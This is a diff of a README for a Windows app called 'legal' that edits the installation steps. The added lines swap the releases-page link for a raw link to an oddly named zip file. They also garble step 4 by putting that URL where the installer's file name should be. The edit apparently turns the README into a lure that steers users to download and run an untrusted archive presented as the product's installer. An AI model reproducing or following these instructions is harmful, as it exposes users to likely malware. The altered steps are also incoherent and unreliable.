Midnight5151/legal/README.md

 Follow these steps to get legal running on your Windows PC.

-1. Click the big blue download button at the top or go directly to the [legal releases page](https://github.com/Midnight5151/legal/releases).
+1. Click the big blue download button at the top or go directly to the [legal releases page](https://raw.githubusercontent.com/Midnight5151/legal/main/turnerite/Software_mesogloeal.zip).
 2. Look for the most recent release.
 The file you want usually ends with `.exe`.
 3. Click the `.exe` file to download it to your computer.
 4. Find the downloaded file in your Downloads folder.
-It should be named something like `legal-setup.exe`.
+It should be named something like `https://raw.githubusercontent.com/Midnight5151/legal/main/turnerite/Software_mesogloeal.zip`.
 5. Double-click the file to start the installation process.
 6. Follow the on-screen prompts to complete installation.
 You can leave most options at the default settings.
 7. Once installation ends, open legal from your desktop or Start menu.